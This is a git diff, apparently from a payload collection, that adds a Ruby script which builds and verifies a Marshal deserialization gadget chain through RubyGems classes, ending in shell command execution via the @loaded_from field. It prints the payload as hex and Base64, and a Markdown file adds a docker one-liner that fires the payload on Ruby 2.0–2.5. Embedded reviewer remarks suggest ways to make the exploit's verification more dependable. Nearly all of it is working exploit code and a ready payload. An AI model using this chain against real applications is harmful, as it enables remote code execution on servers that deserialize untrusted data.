diff --git a/Insecure deserialization/Files/Ruby_universal_gadget_generate_verify.rb b/Insecure deserialization/Files/Ruby_universal_gadget_generate_verify.rb
new file mode 100644
index 00000000..b2fb3e5c
--- /dev/null
+++ b/Insecure deserialization/Files/Ruby_universal_gadget_generate_verify.rb
@@ -0,0 +1,66 @@
+#!/usr/bin/env ruby
+
+class Gem::StubSpecification
+ def initialize; end
+end
+
+
+stub_specification = Gem::StubSpecification.new
+stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
+
+puts "STEP n"
+stub_specification.name rescue nil
+puts
+
+
+class Gem::Source::SpecificFile
+ def initialize; end
+end
+
+specific_file = Gem::Source::SpecificFile.new
+specific_file.instance_variable_set(:@spec, stub_specification)
+
+other_specific_file = Gem::Source::SpecificFile.new
+
+puts "STEP n-1"
+specific_file <=> other_specific_file rescue nil
+puts
+
+
+$dependency_list= Gem::DependencyList.new
+$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
+
+puts "STEP n-2"
+$dependency_list.each{} rescue nil
+puts
+
+
+class Gem::Requirement
+ def marshal_dump
+ [$dependency_list]
+ end
+end
+
+payload = Marshal.dump(Gem::Requirement.new)
+
+puts "STEP n-3"
+Marshal.load(payload) rescue nil
+puts
+
+
+puts "VALIDATION (in fresh ruby process):"
+IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
+ pipe.print payload
+ pipe.close_write
+ puts pipe.gets
+ puts
+end
+
+puts "Payload (hex):"
+puts payload.unpack('H*')[0]
+puts
+
+
+require "base64"
+puts "Payload (Base64 encoded):"
+puts Base64.encode64(payload)
\ No newline at end of file
diff --git a/Insecure deserialization/Ruby.md b/Insecure deserialization/Ruby.md
index 88b80fb2..eed99c44 100644
--- a/Insecure deserialization/Ruby.md
+++ b/Insecure deserialization/Ruby.md
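Review bot: The VALIDATION block's `puts pipe.gets` reads only the child's stdout, but the injected command is `id 1>&2`, so its output presumably lands on the child's inherited stderr and the line printed under the heading is empty — the evidence of execution in the fresh process is then indistinguishable from the output of the in-process STEP runs above it. Merging the child's stderr into the pipe and reading all of it makes the check self-contained: `require "rbconfig"`, `IO.popen([RbConfig.ruby, "-e", "Marshal.load(STDIN.read) rescue nil", err: [:child, :out]], "r+") do |pipe|` and `puts pipe.read`; `RbConfig.ruby` also pins the child to the interpreter running the script rather than whichever `ruby` is first on PATH, which matters when the point is to test a specific version. `Base64.encode64` inserts a newline every 60 characters, so the printed Base64 payload must have its whitespace stripped before reuse; `Base64.strict_encode64(payload)` emits a single line. A header comment stating that the script deliberately executes the injected command (`id`) on the host at each STEP and that every `rescue nil` is intentional — each step appears to raise once the gadget has fired — would keep the next reader from "fixing" either.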
@@ -1,6 +1,10 @@ # Ruby Deserialization -TODO +Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5 + +```ruby +for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done +``` ## Thanks